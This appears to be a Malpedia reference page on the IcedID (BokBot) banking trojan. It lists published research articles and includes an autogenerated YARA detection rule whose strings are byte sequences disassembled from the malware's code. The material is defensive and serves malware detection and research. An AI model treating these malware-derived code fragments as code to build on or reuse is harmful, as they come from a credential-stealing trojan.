@online{frankoff:20181026:unpacking:b6155cc, author = {Sergei Frankoff}, title = {{Unpacking Bokbot / IcedID Malware - Part 1}}, date = {2018-10-26}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=wObF9n2UIAM}, language = {English}, urldate = {2020-01-08} } Unpacking Bokbot / IcedID Malware - Part 1
IcedID
2018-09-07 | Vitali Kremez
@online{kremez:20180907:lets:8515a2b, author = {Vitali Kremez}, title = {{Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1}}, date = {2018-09-07}, url = {https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html}, language = {English}, urldate = {2020-01-08} } Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1
IcedID
2018-08-09 | Fox-IT | Alfred Klason
@online{klason:20180809:bokbot:499f316, author = {Alfred Klason}, title = {{Bokbot: The (re)birth of a banker}}, date = {2018-08-09}, organization = {Fox-IT}, url = {https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/}, language = {English}, urldate = {2019-12-20} } Bokbot: The (re)birth of a banker
IcedID Vawtrak
2018-04-10 | Cisco Talos | Ross Gibb, Daphne Galme, Michael Gorelik
@online{gibb:20180410:icedid:f1a3ff2, author = {Ross Gibb and Daphne Galme and Michael Gorelik}, title = {{IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution}}, date = {2018-04-10}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html}, language = {English}, urldate = {2019-12-17} } IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution
IcedID
2017-11-14 | Digital Guardian | Chris Brook
@online{brook:20171114:iceid:5a074d2, author = {Chris Brook}, title = {{IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites}}, date = {2017-11-14}, organization = {Digital Guardian}, url = {https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites}, language = {English}, urldate = {2019-07-10} } IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites
IcedID
2017-11-13 | SecurityIntelligence | Limor Kessem, Maor Wiesen, Tal Darsan, Tomer Agayev
@online{kessem:20171113:new:bb937fd, author = {Limor Kessem and Maor Wiesen and Tal Darsan and Tomer Agayev}, title = {{New Banking Trojan IcedID Discovered by IBM X-Force Research}}, date = {2017-11-13}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/}, language = {English}, urldate = {2019-11-27} } New Banking Trojan IcedID Discovered by IBM X-Force Research
IcedID IcedID Downloader
2017-11-13 | Intezer | Jay Rosenberg
@online{rosenberg:20171113:icedid:8dd9da4, author = {Jay Rosenberg}, title = {{IcedID Banking Trojan Shares Code with Pony 2.0 Trojan}}, date = {2017-11-13}, organization = {Intezer}, url = {http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/}, language = {English}, urldate = {2019-12-02} } IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
IcedID IcedID Downloader
Yara Rules
[TLP:WHITE] win_icedid_auto (20220411 | Detects win.icedid.)
rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.icedid."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_rule_date = "20220405"
        malpedia_hash = "ecd38294bd47d5589be5cd5490dc8bb4804afc2a"
        malpedia_version = "20220411"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using YARA-Signator.
     * The code and documentation is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { ff15???????? 50 ff15???????? 8bf7 8bc6 eb02 }
            // n = 6, score = 1300
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bf7                 | mov                 esi, edi
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4

        $sequence_1 = { 742c 803e00 7427 6a3b 56 ff15???????? }
            // n = 6, score = 1300
            //   742c                 | je                  0x2e
            //   803e00               | cmp                 byte ptr [esi], 0
            //   7427                 | je                  0x29
            //   6a3b                 | push                0x3b
            //   56                   | push                esi
            //   ff15????????         |                     

        $sequence_2 = { 7411 40 50 6a08 ff15???????? }
            // n = 5, score = 1300
            //   7411                 | je                  0x13
            //   40                   | inc                 eax
            //   50                   | push                eax
            //   6a08                 | push                8
            //   ff15????????         |                     

        $sequence_3 = { ff15???????? 85c0 7420 837c241000 7419 }
            // n = 5, score = 1300
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7420                 | je                  0x22
            //   837c241000           | cmp                 dword ptr [esp + 0x10], 0
            //   7419                 | je                  0x1b

        $sequence_4 = { 50 6801000080 ff15???????? eb13 }
            // n = 4, score = 1300
            //   50                   | push                eax
            //   6801000080           | push                0x80000001
            //   ff15????????         |                     
            //   eb13                 | jmp                 0x15

        $sequence_5 = { f7d0 d1c8 2d20010000 d1c0 f7d0 2d01910000 }
            // n = 6, score = 1300
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax
            //   2d01910000           | sub                 eax, 0x9101

        $sequence_6 = { be01000080 50 56 ff15???????? }
            // n = 4, score = 1300
            //   be01000080           | mov                 esi, 0x80000001
            //   50                   | push                eax
            //   56                   | push                esi
            //   ff15????????         |                     

        $sequence_7 = { eb0f 6a08 ff15???????? 50 ff15???????? 8906 }
            // n = 6, score = 1300
            //   eb0f                 | jmp                 0x11
            //   6a08                 | push                8
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8906                 | mov                 dword ptr [esi], eax

        $sequence_8 = { 7511 56 57 ff15???????? 50 }
            // n = 5, score = 1300
            //   7511                 | jne                 0x13
            //   56                   | push                esi
            //   57                   | push                edi
            //   ff15????????         |                     
            //   50                   | push                eax

        $sequence_9 = { c1c90d 0fbec0 03c8 46 8a06 84c0 75f1 }
            // n = 7, score = 1200
            //   c1c90d               | ror                 ecx, 0xd
            //   0fbec0               | movsx               eax, al
            //   03c8                 | add                 ecx, eax
            //   46                   | inc                 esi
            //   8a06                 | mov                 al, byte ptr [esi]
            //   84c0                 | test                al, al
            //   75f1                 | jne                 0xfffffff3

        $sequence_10 = { e8???????? 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 6, score = 1000
            //   e8????????           |                     
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, dword ptr [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5

        $sequence_11 = { 8be5 5d c3 8b542404 33c9 }
            // n = 5, score = 1000
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp
            //   c3                   | ret                 
            //   8b542404             | mov                 edx, dword ptr [esp + 4]
            //   33c9                 | xor                 ecx, ecx

        $sequence_12 = { 8d4508 50 0fb6440b34 50 }
            // n = 4, score = 800
            //   8d4508               | lea                 eax, dword ptr [ebp + 8]
            //   50                   | push                eax
            //   0fb6440b34           | movzx               eax, byte ptr [ebx + ecx + 0x34]
            //   50                   | push                eax

        $sequence_13 = { 51 51 8b4c240c 53 55 }
            // n = 5, score = 800
            //   51                   | push                ecx
            //   51                   | push                ecx
            //   8b4c240c             | mov                 ecx, dword ptr [esp + 0xc]
            //   53                   | push                ebx
            //   55                   | push                ebp

        $sequence_14 = { 89542414 8b12 85d2 7454 }
            // n = 4, score = 800
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx
            //   7454                 | je                  0x56

        $sequence_15 = { eb5c 8d5004 89542414 8b12 }
            // n = 4, score = 800
            //   eb5c                 | jmp                 0x5e
            //   8d5004               | lea                 edx, dword ptr [eax + 4]
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]

        $sequence_16 = { 8a4173 a808 75f5 a804 7406 }
            // n = 5, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4
            //   7406                 | je                  8

        $sequence_17 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001
            //   e9????????           |                     

        $sequence_18 = { ff5010 85c0 7407 33c0 }
            // n = 4, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax

        $sequence_19 = { 44 8d4904 ff15???????? 33ff }
            // n = 4, score = 300
            //   44                   | inc                 esp
            //   8d4904               | lea                 ecx, dword ptr [ecx + 4]
            //   ff15????????         |                     
            //   33ff                 | xor                 edi, edi

        $sequence_20 = { c7854005000047657450 c78544050000726f6365 c7854805000073734865 66c7854c0500006170 }
            // n = 4, score = 300
            //   c7854005000047657450     | mov    dword ptr [ebp + 0x540], 0x50746547
            //   c78544050000726f6365     | mov    dword ptr [ebp + 0x544], 0x65636f72
            //   c7854805000073734865     | mov    dword ptr [ebp + 0x548], 0x65487373
            //   66c7854c0500006170     | mov    word ptr [ebp + 0x54c], 0x7061

        $sequence_21 = { 85c0 7412 8b4550 85c0 740b }
            // n = 5, score = 300
            //   85c0                 | test                eax, eax
            //   7412                 | je                  0x14
            //   8b4550               | mov                 eax, dword ptr [ebp + 0x50]
            //   85c0                 | test                eax, eax
            //   740b                 | je                  0xd

        $sequence_22 = { ff15???????? 85c0 7473 8b4550 }
            // n = 4, score = 300
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7473                 | je                  0x75
            //   8b4550               | mov                 eax, dword ptr [ebp + 0x50]

        $sequence_23 = { c7853401000050726f63 c7853801000065737300 c785300300006b65726e c78534030000656c3332 }
            // n = 4, score = 300
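            //   c7853401000050726f63     | mov    dword ptr [ebp + 0x134], 0x636f7250
            //   c7853801000065737300     | mov    dword ptr [ebp + 0x138], 0x737365
            //   c785300300006b65726e     | mov    dword ptr [ebp + 0x330], 0x6e72656b
            //   c78534030000656c3332     | mov    dword ptr [ebp + 0x334], 0x32336c65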

        $sequence_24 = { c7859001000056697274 c7859401000075616c46 c7859801000072656500 c785b00400006b65726e }
            // n = 4, score = 300
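            //   c7859001000056697274     | mov    dword ptr [ebp + 0x190], 0x74726956
            //   c7859401000075616c46     | mov    dword ptr [ebp + 0x194], 0x466c6175
            //   c7859801000072656500     | mov    dword ptr [ebp + 0x198], 0x656572
            //   c785b00400006b65726e     | mov    dword ptr [ebp + 0x4b0], 0x6e72656b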

        $sequence_25 = { 0f94c7 8bc7 eb02 33c0 48 }
            // n = 5, score = 300
            //   0f94c7               | sete                bh
            //   8bc7                 | mov                 eax, edi
            //   eb02                 | jmp                 4
            //   33c0                 | xor                 eax, eax
            //   48                   | dec                 eax

        $sequence_26 = { c785a807000053747243 c785ac07000068724100 c7858001000053686c77 c785840100006170692e c78588010000646c6c00 e8???????? }
            // n = 6, score = 300
            //   c785a807000053747243     | mov    dword ptr [ebp + 0x7a8], 0x43727453
            //   c785ac07000068724100     | mov    dword ptr [ebp + 0x7ac], 0x417268
            //   c7858001000053686c77     | mov    dword ptr [ebp + 0x180], 0x776c6853
            //   c785840100006170692e     | mov    dword ptr [ebp + 0x184], 0x2e697061
            //   c78588010000646c6c00     | mov    dword ptr [ebp + 0x188], 0x6c6c64
            //   e8????????           |                     

        $sequence_27 = { 7414 ff15???????? 4c 8bc3 33d2 48 8bc8 }
            // n = 7, score = 300
            //   7414                 | je                  0x16
            //   ff15????????         |                     
            //   4c                   | dec                 esp
            //   8bc3                 | mov                 eax, ebx
            //   33d2                 | xor                 edx, edx
            //   48                   | dec                 eax
            //   8bc8                 | mov                 ecx, eax

        $sequence_28 = { 48 85ff 7414 ff15???????? 4c 8bc7 33d2 }
            // n = 7, score = 300
            //   48                   | dec                 eax
            //   85ff                 | test                edi, edi
            //   7414                 | je                  0x16
            //   ff15????????         |                     
            //   4c                   | dec                 esp
            //   8bc7                 | mov                 eax, edi
            //   33d2                 | xor                 edx, edx

        $sequence_29 = { c785e404000070656e4b c785e804000065794578 66c785ec0400004100 c785900400006b65726e c78594040000656c3332 }
            // n = 5, score = 300
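            //   c785e404000070656e4b     | mov    dword ptr [ebp + 0x4e4], 0x4b6e6570
            //   c785e804000065794578     | mov    dword ptr [ebp + 0x4e8], 0x78457965
            //   66c785ec0400004100     | mov    word ptr [ebp + 0x4ec], 0x41
            //   c785900400006b65726e     | mov    dword ptr [ebp + 0x490], 0x6e72656b
            //   c78594040000656c3332     | mov    dword ptr [ebp + 0x494], 0x32336c65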

        $sequence_30 = { c785e805000065727300 c785f000000057696e68 c785f40000007474702e c785f8000000646c6c00 e8???????? 660f6f05???????? }
            // n = 6, score = 300
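            //   c785e805000065727300     | mov    dword ptr [ebp + 0x5e8], 0x737265
            //   c785f000000057696e68     | mov    dword ptr [ebp + 0xf0], 0x686e6957
            //   c785f40000007474702e     | mov    dword ptr [ebp + 0xf4], 0x2e707474
            //   c785f8000000646c6c00     | mov    dword ptr [ebp + 0xf8], 0x6c6c64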
            //   e8????????           |                     
            //   660f6f05????????     |                     

        $sequence_31 = { 33c0 4c 8d9c24a0000000 49 8b5b20 49 }
            // n = 6, score = 300
            //   33c0                 | xor                 eax, eax
            //   4c                   | dec                 esp
            //   8d9c24a0000000       | lea                 ebx, dword ptr [esp + 0xa0]
            //   49                   | dec                 ecx
            //   8b5b20               | mov                 ebx, dword ptr [ebx + 0x20]
            //   49                   | dec                 ecx

        $sequence_32 = { 837a1000 488bf1 0f8499000000 8b5a10 4803d9 837b0c00 0f8489000000 }
            // n = 7, score = 100
            //   837a1000             | cmp                 dword ptr [rdx + 0x10], 0
            //   488bf1               | mov                 rsi, rcx
            //   0f8499000000         | je                  0x9f
            //   8b5a10               | mov                 ebx, dword ptr [rdx + 0x10]
            //   4803d9               | add                 rbx, rcx
            //   837b0c00             | cmp                 dword ptr [rbx + 0xc], 0
            //   0f8489000000         | je                  0x8f

        $sequence_33 = { 33d2 488bc8 ff15???????? 488bb590020000 4885f6 7414 }
            // n = 6, score = 100
            //   33d2                 | xor                 edx, edx
            //   488bc8               | mov                 rcx, rax
            //   ff15????????         |                     
            //   488bb590020000       | mov                 rsi, qword ptr [rbp + 0x290]
            //   4885f6               | test                rsi, rsi
            //   7414                 | je                  0x16

        $sequence_34 = { 4c8b742420 eba1 488bb590020000 488b7c2438 }
            // n = 4, score = 100
            //   4c8b742420           | mov                 r14, qword ptr [rsp + 0x20]
            //   eba1                 | jmp                 0xffffffffffffffa3
            //   488bb590020000       | mov                 rsi, qword ptr [rbp + 0x290]
            //   488b7c2438           | mov                 rdi, qword ptr [rsp + 0x38]

        $sequence_35 = { 4883c314 e9???????? ff15???????? 33c0 }
            // n = 4, score = 100
            //   4883c314             | add                 rbx, 0x14
            //   e9????????           |                     
            //   ff15????????         |                     
            //   33c0                 | xor                 eax, eax

        $sequence_36 = { ff15???????? 80bb8000000040 0f8577ffffff 488d8b81000000 488d542450 e8???????? }
            // n = 6, score = 100
            //   ff15????????         |                     
            //   80bb8000000040       | cmp                 byte ptr [rbx + 0x80], 0x40
            //   0f8577ffffff         | jne                 0xffffffffffffff7d
            //   488d8b81000000       | lea                 rcx, qword ptr [rbx + 0x81]
            //   488d542450           | lea                 rdx, qword ptr [rsp + 0x50]
            //   e8????????           |                     

        $sequence_37 = { 4c8d8598020000 488d9590020000 488d4d56 e8???????? 85c0 750b ff15???????? }
            // n = 7, score = 100
            //   4c8d8598020000       | lea                 r8, qword ptr [rbp + 0x298]
            //   488d9590020000       | lea                 rdx, qword ptr [rbp + 0x290]
            //   488d4d56             | lea                 rcx, qword ptr [rbp + 0x56]
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   750b                 | jne                 0xd
            //   ff15????????         |                     

        $sequence_38 = { 8364242000 4533c9 33d2 33c9 ff15???????? eb0b }
            // n = 6, score = 100
            //   8364242000           | and                 dword ptr [rsp + 0x20], 0
            //   4533c9               | xor                 r9d, r9d
            //   33d2                 | xor                 edx, edx
            //   33c9                 | xor                 ecx, ecx
            //   ff15????????         |                     
            //   eb0b                 | jmp                 0xd

        $sequence_39 = { ff15???????? 488d5702 488bce ff15???????? ba22000000 }
            // n = 5, score = 100
            //   ff15????????         |                     
            //   488d5702             | lea                 rdx, qword ptr [rdi + 2]
            //   488bce               | mov                 rcx, rsi
            //   ff15????????         |                     
            //   ba22000000           | mov                 edx, 0x22

    condition:
        7 of them and filesize < 303104
}